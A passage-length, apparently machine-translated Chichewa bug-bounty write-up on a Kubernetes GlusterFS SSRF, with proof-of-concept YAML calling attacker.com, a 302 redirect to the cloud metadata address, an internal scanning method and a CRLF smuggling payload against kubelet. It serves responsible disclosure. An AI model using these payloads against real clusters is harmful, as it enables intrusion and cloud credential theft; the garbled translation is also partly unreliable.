Zindikirani. transl.: Olemba nkhaniyi akufotokoza mwatsatanetsatane za momwe adakwanitsira kuzindikira kusatetezeka ku Kubernetes. Ngakhale poyamba sizinawoneke zowopsa kwambiri, kuphatikiza ndi zinthu zina zovuta zake zidakhala zazikulu kwa ena opereka mtambo. Mabungwe angapo anapereka mowolowa manja mphoto kwa akatswiriwa chifukwa cha ntchito yawo.
Ndife ndani
Ndife awiri ofufuza zachitetezo aku France omwe adapeza pamodzi chiwopsezo ku Kubernetes. Mayina athu ndi Brice Augras ndi Christophe Hauquiert, koma pamapulatifomu ambiri a Bug Bounty timadziwika kuti Reeverzax ndi Hach motsatana:
- - ;
- - Wopanga Kubernetes ku Nokia.
Chinachitika ndi chiyani?
Nkhaniyi ndi njira yathu yogawana momwe kafukufuku wamba adasinthira mosayembekezereka kukhala ulendo wosangalatsa kwambiri m'moyo wa osaka nsikidzi (makamaka pakadali pano).
Monga mukudziwa, osaka ma bug ali ndi zinthu zingapo zodziwika bwino:
- amakhala pa pizza ndi mowa;
- amagwira ntchito pamene wina aliyense akugona.
Nafenso ndife osiyana ndi malamulowa: nthawi zambiri timakumana Loweruka ndi Lamlungu ndipo timakhala osagona tikubera usiku. Koma limodzi la mausiku amenewa linatha modabwitsa kwambiri.
Poyamba tinkakumana kuti tikambirane za kutenga nawo mbali tsiku lotsatira. Pokambirana za chitetezo cha Kubernetes pamalo ogwirira ntchito, tidakumbukira lingaliro lakale la SSRF () ndipo adaganiza zoyesa kugwiritsa ntchito ngati script yotsutsa.
Nthawi ya 11 pm tinakhala pansi kuti tifufuze ndipo tinagona m'mawa kwambiri, titakhutira ndi zotsatira zake. Zinali chifukwa cha kafukufukuyu kuti tidapeza pulogalamu ya MSRC Bug Bounty ndipo tidapeza mwayi wokulirapo.
Patadutsa milungu ingapo/miyezi ingapo, ndipo zotsatira zathu zosayembekezereka zinatipatsa mphoto yapamwamba kwambiri m'mbiri ya Azure Cloud Bug Bounty - kuwonjezera pa zomwe tinalandira kuchokera kwa Kubernetes!
Kutengera ndi polojekiti yathu yofufuza, Kubernetes Product Security Committee idasindikiza .
Tsopano ndikufuna kufalitsa zambiri zachiwopsezo chopezeka momwe ndingathere. Tikukhulupirira kuti mumayamikira zomwe mwapeza ndikugawana zambiri zaukadaulo ndi mamembala ena amgulu la infosec!
Nayi nkhani yathu ...
Nkhani
Kuti timvetse bwino zomwe zidachitika, tiyeni tiwone kaye momwe Kubernetes amagwirira ntchito pamalo oyendetsedwa ndi mtambo.
Mukakhazikitsa gulu la Kubernetes pamalo otero, kusanja koyang'anira nthawi zambiri kumakhala udindo wa opereka mtambo:
Gawo lowongolera lili pamtunda wa operekera mtambo, pomwe ma node a Kubernetes ali pafupi ndi kasitomala.
Kuti mugawire ma voliyumu mwamphamvu, makina amagwiritsidwa ntchito kuti azitha kuwapereka kuchokera kumalo osungira akunja ndikuwayerekeza ndi PVC (kudandaula kwa voliyumu kosalekeza, mwachitsanzo, pempho la voliyumu).
Chifukwa chake, PVC itapangidwa ndikumangika ku StorageClass mugulu la K8s, zochita zina zoperekera voliyumu zimatengedwa ndi woyang'anira kube / mtambo (dzina lake lenileni limadalira kumasulidwa). (Zindikirani. transl.: Talemba kale zambiri za CCM pogwiritsa ntchito chitsanzo cha kukhazikitsidwa kwake kwa mmodzi wa opereka mitambo .)
Pali mitundu ingapo ya othandizira omwe amathandizidwa ndi Kubernetes: ambiri aiwo akuphatikizidwa , pamene zina zimayendetsedwa ndi zowonjezera zowonjezera zomwe zimayikidwa m'magulu amagulu.
Mu kafukufuku wathu, tidayang'ana kwambiri njira yoperekera voliyumu mkati, yomwe ikuwonetsedwa pansipa:
Kupereka kwamphamvu kwamavoliyumu pogwiritsa ntchito Kubernetes provider
Mwachidule, Kubernetes akayikidwa pamalo oyendetsedwa, woyang'anira woyang'anira ndi udindo wa wopereka mtambo, koma pempho lopanga voliyumu (nambala 3 pa chithunzi pamwambapa) limasiya netiweki yamkati ya opereka mtambo. Ndipo apa ndi pamene zinthu zimakhala zosangalatsa kwambiri!
Kubera zochitika
M'chigawo chino, tifotokoza momwe tinagwiritsira ntchito njira zomwe tazitchula pamwambapa ndikupeza zomwe zili mkati mwa wothandizira mtambo. Ikuwonetsanso momwe mungachitire zinthu zina, monga kupeza zidziwitso zamkati kapena mwayi womwe ukukulirakulira.
Kunyengerera kumodzi kosavuta (pankhaniyi, Service Side Request Forgery) kunathandizira kupyola malo a kasitomala kukhala magulu a opereka chithandizo osiyanasiyana omwe amayendetsedwa ndi K8.
Pakufufuza kwathu tidayang'ana kwambiri wopereka GlusterFS. Ngakhale kuti kutsatizana kwinanso kwafotokozedwa m'nkhaniyi, Quobyte, StorageOS ndi ScaleIO ali pachiopsezo chomwecho.
Kugwiritsa ntchito molakwika makina operekera voliyumu
Pa kusanthula kalasi yosungirako GlusterFS mu Golang kasitomala source code ife kuti pa pempho loyamba la HTTP (3) lomwe linatumizidwa panthawi yopanga voliyumu, mpaka kumapeto kwa ulalo wachizolowezi mu parameter resturl anawonjezera /volumes.
Tinaganiza zochotsa njira yowonjezera iyi powonjezera # mu parameter resturl. Nayi kasinthidwe koyamba kwa YAML komwe tidayesa kuyesa kusatetezeka kwa SSRF (mutha kuwerenga zambiri za semi-blind kapena theka-blind SSRF, mwachitsanzo, - pafupifupi. transl.):
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrfKenako tidagwiritsa ntchito binary kuyang'anira kutali gulu la Kubernetes kubctl. Nthawi zambiri, opereka mtambo (Azure, Google, AWS, ndi zina) amakulolani kuti mupeze ziphaso zomwe mungagwiritse ntchito pachida ichi.
Chifukwa cha izi, ndinatha kugwiritsa ntchito fayilo yanga "yapadera". Kube-controller-manager adachita zomwe adapempha pa HTTP:
kubectl create -f sc-poc.yaml
Yankho kuchokera kwa wowukirayo
Posakhalitsa izi, tinathanso kulandira yankho la HTTP kuchokera ku seva yomwe tikufuna - kudzera m'malamulo describe pvc kapena get events mu kubectl. Ndipo zowona: dalaivala wa Kubernetes wokhazikika uyu ndi wabodza kwambiri pamachenjezo ake / mauthenga olakwika ...
Nachi chitsanzo chokhala ndi ulalo ku https://www.google.frkhalani ngati parameter resturl:
kubectl describe pvc poc-ssrf
# ΠΈΠ»ΠΈ ΠΆΠ΅ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π²ΠΎΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡΡΡ kubectl get events
Mwanjira iyi, tinali ochepa ku mafunso ngati HTTP POST ndipo sanathe kupeza zomwe zili mu bungwe loyankhira ngati code yobwereza inali 201. Chifukwa chake, tidaganiza zopanga kafukufuku wowonjezera ndikukulitsa izi ndi njira zatsopano.
Kusintha kwa kafukufuku wathu
- Advanced Scenario #1: Kugwiritsa ntchito 302 kutumiziranso kuchokera ku seva yakunja kuti musinthe njira ya HTTP kuti mupereke njira yosinthira yosonkhanitsira deta yamkati.
- Nkhani Yotsogola #2: Yambitsani kusanthula kwa LAN ndikupeza zida zamkati.
- Zochitika zapamwamba #3: kugwiritsa ntchito kuzembetsa kwa HTTP CRLF + ("kupempha kuzembetsa") kuti mupange zopempha za HTTP zofananira ndikupezanso zomwe zachotsedwa pazipika za kube-controller.
Mfundo Zaukadaulo
- Kafukufukuyu adagwiritsa ntchito Azure Kubernetes Service (AKS) yokhala ndi Kubernetes mtundu 1.12 kudera la North Europe.
- Zomwe tafotokozazi zidachitika pazotulutsa zaposachedwa za Kubernetes, kupatula zochitika zachitatu, chifukwa. amafunikira Kubernetes yomangidwa ndi mtundu wa Golang β€ 1.12.
- Seva yakunja ya Attacker -
https://attacker.com.
Nkhani Yotsogola #1: Kuwongolera pempho la HTTP POST kuti GET ndi kulandira deta yovuta
Njira yoyambirira idawongoleredwa ndi kasinthidwe ka seva ya wowukirayo kuti ibwerere 302 HTTP Retcodekuti mutembenuzire pempho la POST kukhala pempho la GET (gawo 4 pajambula):
Pempho loyamba (3) lochokera kwa kasitomala GlusterFS (Woyang'anira Woyang'anira), ali ndi mtundu wa POST. Potsatira izi tidatha kusintha kukhala GET:
- Monga parameter
resturlmu StorageClass zikuwonetsedwahttp://attacker.com/redirect.php. - Mapeto
https://attacker.com/redirect.phpimayankha ndi 302 HTTP code code yokhala ndi Malo Otsatirawa:http://169.254.169.254. Izi zitha kukhala zina zilizonse zamkati - pakadali pano, ulalo wowongolera umagwiritsidwa ntchito ngati chitsanzo. - zotsatira net/http laibulale Golang amalozeranso pempholi ndikusintha POST kukhala GET yokhala ndi khodi ya 302, zomwe zimapangitsa pempho la HTTP GET kuzinthu zomwe mukufuna.
Kuti muwerenge gulu la mayankho a HTTP muyenera kuchita describe PVC chinthu:
kubectl describe pvc xxxNachi chitsanzo cha mayankho a HTTP mumtundu wa JSON omwe tidatha kulandira:
Kuthekera kwa kusatetezeka komwe kunapezeka panthawiyo kunali kochepa chifukwa cha izi:
- Kulephera kuyika mitu ya HTTP pazopempha zomwe zatuluka.
- Kulephera kuchita pempho la POST ndi magawo m'thupi (izi ndizosavuta kufunsa mtengo wofunikira kuchokera pa etcd zomwe zikuyenda 2379 doko ngati HTTP yosasungidwa ikugwiritsidwa ntchito).
- Kulephera kubweza zomwe zili mugulu loyankhidwa pomwe code code inali 200 ndipo yankho linalibe JSON Content-Type.
Zochitika zapamwamba #2: Kusanthula netiweki yakomweko
Njira ya SSRF yakhunguyi idagwiritsidwa ntchito kusanthula netiweki yamkati ya opereka mtambo ndikusankha mautumiki osiyanasiyana omvera (mwachitsanzo, Metadata, Kubelet, etcd, etc.) kutengera mayankho. kukhala controller.
Choyamba, madoko omvera amtundu wa Kubernetes adatsimikiziridwa (8443, 10250, 10251, etc.), ndiyeno tidayenera kupanga sikani.
Powona kuti njira yojambulira zidayi ndi yodziwika bwino ndipo siyigwirizana ndi makina ojambulira akale ndi zida za SSRF, tidaganiza zopanga antchito athu mu bash script yomwe imagwiritsa ntchito njira yonseyo.
Mwachitsanzo, kuti mufufuze mwachangu mitundu 172.16.0.0/12 ya netiweki yamkati, ogwira ntchito 15 adakhazikitsidwa mofanana. Mtundu wa IP womwe uli pamwambapa wasankhidwa ngati chitsanzo chokha ndipo ukhoza kusinthidwa kukhala mtundu wa IP wa omwe akukupatsani.
Kuti muwone adilesi imodzi ya IP ndi doko limodzi, muyenera kuchita izi:
- Chotsani StorageClass yomaliza yosungidwa;
- chotsani Zomwe Zatsimikiziridwa Zakale Zotsutsa Volume;
- sinthani ma IP ndi ma Port
sc.yaml; - pangani StorageClass yokhala ndi IP yatsopano ndi doko;
- pangani PVC yatsopano;
- Chotsani zotsatira za scan pogwiritsa ntchito kulongosola kwa PVC.
Zochitika zapamwamba #3: jakisoni wa CRLF + kuzembetsa HTTP mumitundu "yakale" ya gulu la Kubernetes
Ngati kuwonjezera pa izi wopereka amapereka makasitomala mitundu yakale ya K8s cluster ΠΈ adawapatsa mwayi wofikira pazipika za kube-controller-manager, zotsatira zake zidakhala zofunikira kwambiri.
Ndikosavuta kwambiri kuti wowukira asinthe zopempha za HTTP kuti apeze yankho lathunthu la HTTP pakufuna kwake.
Kuti akwaniritse zochitika zomaliza, zinthu zotsatirazi zidayenera kukwaniritsidwa:
- Wogwiritsa ntchitoyo ayenera kukhala ndi mwayi wofikira kube-controller-manager (monga, mwachitsanzo, mu Azure LogInsights).
- Gulu la Kubernetes liyenera kugwiritsa ntchito mtundu wa Golang wotsika kuposa 1.12.
Tidatumiza malo amderali omwe amatengera kulumikizana pakati pa kasitomala wa GlusterFS Go ndi seva yabodza (tidzapewa kusindikiza PoC pakadali pano).
Anapezeka , zomwe zikukhudza mitundu ya Golang yotsika kuposa 1.12 ndikulola kubera kuti achite ziwopsezo za HTTP / CRLF.
Mwa kuphatikiza theka-khungu SSRF tafotokozazi Π²ΠΌΠ΅ΡΡΠ΅ ndi izi, tinatha kutumiza zopempha zomwe timakonda, kuphatikizapo kusintha mitu, njira ya HTTP, magawo ndi deta, zomwe kube-controller-manager ndiye adakonza.
Pano pali chitsanzo cha "nyambo" yogwira ntchito mu parameter resturl StorageClass, yomwe imagwiritsa ntchito zochitika zofananazi:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrnZotsatira zake ndi zolakwika kuyankha mosafunsidwa, uthenga womwe umalembedwa muzolemba zowongolera. Chifukwa cha verbosity yomwe yathandizidwa mwachisawawa, zomwe zili mu uthenga wa HTTP zimasungidwanso pamenepo.
Ichi chinali "nyambo" yathu yothandiza kwambiri mkati mwa umboni wa lingaliro.
Pogwiritsa ntchito njirayi, tidatha kuchita zina mwazotsatira zamagulu a opereka ma k8 osiyanasiyana omwe amayendetsedwa: kukwera kwamwayi ndi zidziwitso pazochitika za metadata, Master DoS kudzera (zosalemba) HTTP zopempha pa etcd master zochitika, ndi zina zotero.
Zotsatira
M'mawu ovomerezeka a Kubernetes okhudzana ndi chiwopsezo cha SSRF chomwe tidapeza, adavotera CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Ngati tingoganizira za chiwopsezo chokhudzana ndi perimeter ya Kubernetes, vekitala ya chilungamo (Vector ya chilungamo) ikuyenerera ngati palibe.
Komabe, kuwunika zotsatira zomwe zingatheke poyang'anira malo ogwirira ntchito (ndipo iyi inali gawo losangalatsa kwambiri la kafukufuku wathu!) Zovuta CVSS10/10 kwa ogawa ambiri.
Pansipa pali zambiri zokuthandizani kumvetsetsa zomwe tikuganiza powunika zomwe zingakhudze zomwe zingachitike mumtambo:
Umphumphu
- Perekani malamulo patali pogwiritsa ntchito zizindikiro zamkati zomwe mwapeza.
- Kupanganso zomwe zili pamwambapa pogwiritsa ntchito njira ya IDOR (Insecure Direct Object Reference) ndi zinthu zina zopezeka pa netiweki yakomweko.
Chinsinsi
- Mtundu wowukira zikomo chifukwa chakuba zidziwitso zamtambo (mwachitsanzo, metadata API).
- Kusonkhanitsa zambiri mwa kusanthula maukonde akomweko (kuzindikira mtundu wa SSH, mtundu wa seva ya HTTP, ...).
- Sonkhanitsani zambiri za zochitika ndi zomangamanga povotera ma API amkati monga metadata API (
http://169.254.169.254, ...). - Kuba deta yamakasitomala pogwiritsa ntchito zidziwitso zamtambo.
Kupezeka
Zonse zimagwiritsa ntchito zochitika zokhudzana ndi ma vectors owukira umphumphu, itha kugwiritsidwa ntchito pazinthu zowononga ndikupangitsa kuti zochitika zabwino kuchokera pamlingo wa kasitomala (kapena china chilichonse) kusapezeka.
Popeza tinali m'malo oyendetsedwa ndi K8s ndikuwunika momwe kukhulupirika kwathu kukhudzira, titha kulingalira zochitika zambiri zomwe zingakhudze kupezeka. Zitsanzo zowonjezera zikuphatikiza kuipitsa nkhokwe ya etcd kapena kuyimba foni ku Kubernetes API.
Nthawi
- Disembala 6, 2019: Chiwopsezo chinanenedwa ku MSRC Bug Bounty.
- Januware 3, 2020: Wina adauza opanga Kubernetes kuti tikukonzekera zachitetezo. Ndipo adawafunsa kuti aganizire SSRF ngati chiwopsezo chamkati (mkati-kati). Kenako tidapereka lipoti lanthawi zonse lokhala ndi zambiri zaukadaulo za komwe kwayambitsa vuto.
- Januware 15, 2020: Tidapereka malipoti aukadaulo ndi wamba kwa opanga Kubernetes atapempha (kudzera pa nsanja ya HackerOne).
- Januware 15, 2020: Madivelopa a Kubernetes adatidziwitsa kuti jakisoni wakhungu wa SSRF + CRLF wotulutsidwa m'mbuyomu amawonedwa ngati pachiwopsezo chapakati. Nthawi yomweyo tinasiya kusanthula madera ena opereka chithandizo: gulu la K8s tsopano linali kuthana ndi zomwe zidayambitsa.
- Januware 15, 2020: Mphotho ya MSRC idalandiridwa kudzera ku HackerOne.
- Januware 16, 2020: Kubernetes PSC (Komiti Yoyang'anira Zachitetezo) idazindikira kusatetezekako ndipo idapempha kuti izikhala zachinsinsi mpaka pakati pa Marichi chifukwa cha kuchuluka kwa omwe akhudzidwa.
- February 11, 2020: Mphotho ya Google VRP idalandiridwa.
- Marichi 4, 2020: Mphotho ya Kubernetes idalandiridwa kudzera ku HackerOne.
- Marichi 15, 2020: Kuwulutsa kwapagulu komwe kudakonzedweratu kudayimitsidwa chifukwa cha vuto la COVID-19.
- June 1, 2020: Kubernetes + Microsoft mawu ophatikizana pazachiwopsezo.
TL; DR
- Timamwa mowa ndikudya pizza :)
- Tidapeza chiopsezo chapakati ku Kubernetes, ngakhale tinalibe cholinga chotero.
- Tinachita kafukufuku wowonjezera pamagulu a opereka mitambo osiyanasiyana ndipo tinatha kuonjezera zowonongeka chifukwa cha chiopsezo cholandira mabonasi owonjezera odabwitsa.
- Mupeza zambiri zaukadaulo m'nkhaniyi. Tikhala okondwa kukambirana nanu (Twitter: & ).
- Zinapezeka kuti mitundu yonse yamachitidwe ndi malipoti zidatenga nthawi yayitali kuposa momwe amayembekezera.
powatsimikizira
- ;
- ;
- ;
- .
PS kuchokera kwa womasulira
Werenganinso pa blog yathu:
- Β«";
- Β«";
- Β«".
Source: www.habr.com